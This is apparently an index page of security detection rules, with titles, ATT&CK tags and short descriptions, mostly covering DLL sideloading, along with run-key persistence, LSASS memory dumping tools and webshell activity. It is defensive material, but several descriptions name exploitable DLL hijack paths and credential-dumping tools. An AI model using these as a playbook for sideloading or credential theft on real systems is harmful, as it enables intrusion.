Detection.FYI
open-menu closeme
  • APT27 - Emissary Panda Activity

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001 attack.g0027 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27


    Read More
  • Aruba Network Service Potential DLL Sideloading

    calendar May 15, 2025 · attack.privilege-escalation attack.persistence attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking


    Read More
  • Creation Of Non-Existent System DLL

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.


    Read More
  • DHCP Callout DLL Installation

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001 attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)


    Read More
  • DHCP Server Error Failed Loading the CallOut DLL

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded


    Read More
  • DHCP Server Loaded the CallOut DLL

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded


    Read More
  • Diamond Sleet APT DLL Sideloading Indicators

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects DLL sideloading activity seen used by Diamond Sleet APT


    Read More
  • DLL Names Used By SVR For GraphicalProton Backdoor

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Hunts known SVR-specific DLL names.


    Read More
  • DLL Search Order Hijackig Via Additional Space in Path

    calendar May 15, 2025 · attack.persistence attack.privilege-escalation attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack


    Read More
  • DLL Sideloading by VMware Xfer Utility

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL


    Read More
  • DLL Sideloading Of ShellChromeAPI.DLL

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter


    Read More
  • DNS Server Error Failed Loading the ServerLevelPluginDLL

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded


    Read More
  • Fax Service DLL Search Order Hijack

    calendar May 15, 2025 · attack.persistence attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.


    Read More
  • Lazarus APT DLL Sideloading Activity

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001 attack.g0032 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company


    Read More
  • Malicious DLL File Dropped in the Teams or OneDrive Folder

    calendar May 15, 2025 · attack.persistence attack.privilege-escalation attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded


    Read More
  • Microsoft Defender Blocked from Loading Unsigned DLL

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL


    Read More
  • Microsoft Office DLL Sideload

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location


    Read More
  • New DNS ServerLevelPluginDll Installed

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001 attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)


    Read More
  • New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001 attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)


    Read More
  • Potential 7za.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "7za.dll"


    Read More
  • Potential Antivirus Software DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc


    Read More
  • Potential appverifUI.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "appverifUI.dll"


    Read More
  • Potential AVKkid.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "AVKkid.dll"


    Read More
  • Potential Azure Browser SSO Abuse

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user.


    Read More
  • Potential CCleanerDU.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "CCleanerDU.dll"


    Read More
  • Potential CCleanerReactivator.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "CCleanerReactivator.dll"


    Read More
  • Potential Chrome Frame Helper DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "chrome_frame_helper.dll"


    Read More
  • Potential DLL Sideloading Of DBGCORE.DLL

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects DLL sideloading of "dbgcore.dll"


    Read More
  • Potential DLL Sideloading Of DBGHELP.DLL

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "dbghelp.dll"


    Read More
  • Potential DLL Sideloading Of DbgModel.DLL

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "DbgModel.dll"


    Read More
  • Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".


    Read More
  • Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location


    Read More
  • Potential DLL Sideloading Of MpSvc.DLL

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "MpSvc.dll".


    Read More
  • Potential DLL Sideloading Of MsCorSvc.DLL

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "mscorsvc.dll".


    Read More
  • Potential DLL Sideloading Of Non-Existent DLLs From System Folders

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.


    Read More
  • Potential DLL Sideloading Via ClassicExplorer32.dll

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software


    Read More
  • Potential DLL Sideloading Via comctl32.dll

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading using comctl32.dll to obtain system privileges


    Read More
  • Potential DLL Sideloading Via DeviceEnroller.EXE

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter


    Read More
  • Potential DLL Sideloading Via JsSchHlp

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor


    Read More
  • Potential DLL Sideloading Via VMware Xfer

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL


    Read More
  • Potential EACore.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "EACore.dll"


    Read More
  • Potential Edputil.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "edputil.dll"


    Read More
  • Potential Goopdate.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe


    Read More
  • Potential Iviewers.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)


    Read More
  • Potential Libvlc.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"


    Read More
  • Potential Mfdetours.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.


    Read More
  • Potential Mpclient.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.


    Read More
  • Potential Mpclient.DLL Sideloading Via Defender Binaries

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.


    Read More
  • Potential PlugX Activity

    calendar May 15, 2025 · attack.s0013 attack.defense-evasion attack.t1574.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location


    Read More
  • Potential Python DLL SideLoading

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of Python DLL files.


    Read More
  • Potential Raspberry Robin Aclui Dll SideLoading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential sideloading of malicious "aclui.dll" by OleView.This behavior was observed in Raspberry-Robin variants reported by chekpoint research on Feburary 2024.


    Read More
  • Potential Rcdll.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of rcdll.dll


    Read More
  • Potential RjvPlatform.DLL Sideloading From Default Location

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.


    Read More
  • Potential RjvPlatform.DLL Sideloading From Non-Default Location

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.


    Read More
  • Potential RoboForm.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager


    Read More
  • Potential ShellDispatch.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "ShellDispatch.dll"


    Read More
  • Potential SmadHook.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus


    Read More
  • Potential SolidPDFCreator.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "SolidPDFCreator.dll"


    Read More
  • Potential System DLL Sideloading From Non System Locations

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).


    Read More
  • Potential Vivaldi_elf.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "vivaldi_elf.dll"


    Read More
  • Potential Waveedit.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.


    Read More
  • Potential Wazuh Security Platform DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL side loading of DLLs that are part of the Wazuh security platform


    Read More
  • Potential WWlib.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of "wwlib.dll"


    Read More
  • Potentially Suspicious Child Process of KeyScrambler.exe

    calendar May 15, 2025 · attack.execution attack.defense-evasion attack.privilege-escalation attack.t1203 attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious child processes of KeyScrambler.exe


    Read More
  • Renamed Vmnat.exe Execution

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects renamed vmnat.exe or portable version that can be used for DLL side-loading


    Read More
  • Suspicious GUP Usage

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks


    Read More
  • Suspicious Unsigned Thor Scanner Execution

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects loading and execution of an unsigned thor scanner binary.


    Read More
  • Tasks Folder Evasion

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.execution attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr


    Read More
  • Third Party Software DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)


    Read More
  • UAC Bypass With Fake DLL

    calendar May 15, 2025 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1548.002 attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Attempts to load dismcore.dll after dropping it


    Read More
  • Unsigned Binary Loaded From Suspicious Location

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations


    Read More
  • Unsigned Mfdetours.DLL Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.


    Read More
  • Unsigned Module Loaded by ClickOnce Application

    calendar May 15, 2025 · attack.persistence attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects unsigned module load by ClickOnce application.


    Read More
  • VMGuestLib DLL Sideload

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.


    Read More
  • VMMap Signed Dbghelp.DLL Potential Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.


    Read More
  • VMMap Unsigned Dbghelp.DLL Potential Sideloading

    calendar May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.


    Read More
  • Winnti Malware HK University Campaign

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001 attack.g0044 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities


    Read More
  • Winnti Pipemon Characteristics

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001 attack.g0044 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects specific process characteristics of Winnti Pipemon malware reported by ESET


    Read More
  • Xwizard.EXE Execution From Non-Default Location

    calendar May 15, 2025 · attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of Xwizard tool from a non-default directory. When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".


    Read More
  • Potentially Suspicious WDAC Policy File Creation

    calendar May 12, 2025 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.


    Read More
  • Direct Autorun Keys Modification

    calendar May 12, 2025 · attack.persistence attack.t1547.001  ·
    Share on: twitter facebook linkedin copy

    Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.


    Read More
  • New RUN Key Pointing to Suspicious Folder

    calendar May 12, 2025 · attack.persistence attack.t1547.001  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious new RUN key element pointing to an executable in a suspicious folder


    Read More
  • Potential Persistence Attempt Via Run Keys Using Reg.EXE

    calendar May 12, 2025 · attack.persistence attack.t1547.001  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious command line reg.exe tool adding key to RUN key in Registry


    Read More
  • Suspicious Autorun Registry Modified via WMI

    calendar May 12, 2025 · attack.execution attack.persistence attack.t1547.001 attack.t1047  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.


    Read More
  • Suspicious Powershell In Registry Run Keys

    calendar May 12, 2025 · attack.persistence attack.t1547.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential PowerShell commands or code within registry run keys


    Read More
  • Suspicious PowerShell Invocations - Specific

    calendar May 12, 2025 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious PowerShell invocation command parameters


    Read More
  • Suspicious PowerShell Invocations - Specific - PowerShell Module

    calendar May 12, 2025 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious PowerShell invocation command parameters


    Read More
  • Suspicious Run Key from Download

    calendar May 12, 2025 · attack.persistence attack.t1547.001  ·
    Share on: twitter facebook linkedin copy

    Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories


    Read More
  • CreateDump Process Dump

    calendar Apr 25, 2025 · attack.defense-evasion attack.t1036 attack.t1003.001 attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects uses of the createdump.exe LOLOBIN utility to dump process memory


    Read More
  • DumpMinitool Execution

    calendar Apr 25, 2025 · attack.defense-evasion attack.t1036 attack.t1003.001 attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"


    Read More
  • HackTool - HandleKatz Duplicating LSASS Handle

    calendar Apr 25, 2025 · attack.execution attack.t1106 attack.defense-evasion attack.t1003.001 attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles


    Read More
  • HackTool - XORDump Execution

    calendar Apr 25, 2025 · attack.defense-evasion attack.t1036 attack.t1003.001 attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious use of XORDump process memory dumping utility


    Read More
  • Potential SysInternals ProcDump Evasion

    calendar Apr 25, 2025 · attack.defense-evasion attack.t1036 attack.t1003.001 attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name


    Read More
  • Procdump Execution

    calendar Apr 25, 2025 · attack.defense-evasion attack.t1036 attack.t1003.001 attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the SysInternals Procdump utility


    Read More
  • Renamed CreateDump Utility Execution

    calendar Apr 25, 2025 · attack.defense-evasion attack.t1036 attack.t1003.001 attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory


    Read More
  • Suspicious DumpMinitool Execution

    calendar Apr 25, 2025 · attack.defense-evasion attack.credential-access attack.t1036 attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious ways to use the "DumpMinitool.exe" binary


    Read More
  • Bitbucket User Permissions Export Attempt

    calendar Apr 25, 2025 · attack.reconnaissance attack.collection attack.discovery attack.t1213 attack.t1082 attack.t1591.004  ·
    Share on: twitter facebook linkedin copy

    Detects user permission data export attempt.


    Read More
  • Chopper Webshell Process Pattern

    calendar Apr 25, 2025 · attack.persistence attack.discovery attack.t1505.003 attack.t1018 attack.t1033 attack.t1087  ·
    Share on: twitter facebook linkedin copy

    Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells


    Read More
  • Exports Critical Registry Keys To a File

    calendar Apr 25, 2025 · attack.exfiltration attack.discovery attack.t1012  ·
    Share on: twitter facebook linkedin copy

    Detects the export of a crital Registry key to a file.


    Read More
  • Exports Registry Key To a File

    calendar Apr 25, 2025 · attack.exfiltration attack.discovery attack.t1012  ·
    Share on: twitter facebook linkedin copy

    Detects the export of the target Registry key to a file.


    Read More
  • HackTool - SharpUp PrivEsc Tool Execution

    calendar Apr 25, 2025 · attack.privilege-escalation attack.discovery attack.execution attack.t1615 attack.t1569.002 attack.t1574.005  ·
    Share on: twitter facebook linkedin copy

    Detects the use of SharpUp, a tool for local privilege escalation


    Read More
  • HackTool - winPEAS Execution

    calendar Apr 25, 2025 · attack.privilege-escalation attack.discovery attack.t1082 attack.t1087 attack.t1046  ·
    Share on: twitter facebook linkedin copy

    WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz


    Read More
  • SharpHound Recon Sessions

    calendar Apr 25, 2025 · attack.discovery attack.t1033  ·
    Share on: twitter facebook linkedin copy

    Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.


    Read More
  • Webshell Detection With Command Line Keywords

    calendar Apr 25, 2025 · attack.persistence attack.discovery attack.t1505.003 attack.t1018 attack.t1033 attack.t1087  ·
    Share on: twitter facebook linkedin copy

    Detects certain command line parameters often used during reconnaissance activity via web shells


    Read More
  • Webshell Hacking Activity Patterns

    calendar Apr 25, 2025 · attack.persistence attack.discovery attack.t1505.003 attack.t1018 attack.t1033 attack.t1087  ·
    Share on: twitter facebook linkedin copy

    Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system


    Read More
  • Suspicious CrushFTP Child Process

    calendar Apr 17, 2025 · attack.initial-access attack.execution attack.t1059.001 attack.t1059.003 attack.t1190 cve.2025-31161 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests. The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands.


    Read More
  • Suspicious Process Spawned by CentreStack Portal AppPool

    calendar Apr 17, 2025 · attack.execution attack.t1059.003 attack.t1505.003 cve.2025-30406 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406)


    Read More
  • Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC

    calendar Apr 17, 2025 · attack.execution attack.lateral-movement attack.t1210 cve.2020-1472 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the commonly used ZeroLogon PoC executable.


    Read More
  • Hiding User Account Via SpecialAccounts Registry Key - CommandLine

    calendar Apr 17, 2025 · attack.t1564.002  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.


    Read More
  • Obfuscated PowerShell OneLiner Execution

    calendar Apr 17, 2025 · attack.defense-evasion attack.execution attack.t1059.001 attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a specific OneLiner to download and execute powershell modules in memory.


    Read More
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1

    calendar Apr 17, 2025 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.


    Read More
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2

    calendar Apr 17, 2025 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.


    Read More
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3

    calendar Apr 17, 2025 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.


    Read More
